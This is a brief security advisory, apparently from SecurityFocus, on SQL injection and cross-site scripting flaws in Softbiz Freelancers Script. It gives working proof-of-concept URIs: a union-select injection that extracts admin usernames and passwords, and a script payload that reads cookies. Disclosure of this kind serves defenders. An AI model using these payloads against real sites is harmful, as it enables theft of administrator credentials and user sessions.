Softbiz Freelancers Script Multiple Vulnerabilities

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

For the SQL-injection issue:
http://www.example.com/search_form.php?sb_showresult=1&sb_protype=999999%20union/**/select/**/0,CoNcAt(0x4c6f67696e3a,sb_admin_name,0x3c686579206578706c6f69743e2050617373776f72643a,sb_pwd,0x3c686579206578706c6f69743e),2/**/from/**/sbprj_admin/*

For the cross-site scripting issue:
http://www.example.com/signin.php?errmsg=<script>alert(document.cookie);</script>

The following proof-of-concept code is also available:


 

Privacy Statement
Copyright 2010, SecurityFocus